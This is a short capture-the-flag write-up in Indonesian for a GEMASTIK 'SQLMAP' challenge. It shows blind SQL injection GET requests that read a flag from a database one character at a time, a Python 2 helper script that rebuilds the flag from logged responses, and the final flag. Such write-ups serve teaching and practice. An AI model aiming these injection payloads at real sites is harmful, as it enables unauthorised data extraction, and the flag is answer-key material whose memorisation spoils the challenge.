GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>2 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>1 AND '%'='HTTP/1.1

Kemudian kita menggunakan script python untuk mendapatkan jawabannya menggunakan script python ini yang membantu untuk mencari kemungkinan tiap karakter

import base64

data = open("dataclean").read().split("\n")

tmp = []
tmpN = []

for x in range(7*42):
    pointer = 0
    tmpN.append(data[x].split(">")[1].split(" ")[0])
    if x in [x for x in range(6,7*42,7)]:
        print "Current Flag: "+"".join(chr(int(x)) for x in tmp)
        print "1-2-3-4-5-6-7"
        print "-".join(chr(int(x)) for x in tmpN)
        choose = input("Choose: ")
        tmp.append(tmpN[choose-1])
        tmpN = []    

print tmp

Setelah mencoba2 didapatkan seperti digambar

kemudian kita melakukan sedikit perbaikan dengan mengubah p menjadi t

Flag: GEMASTIK{know_the_concept_not_the_tools!}

SQLMAP

SQLMAP - 125 Points

POC

results matching ""

No results matching ""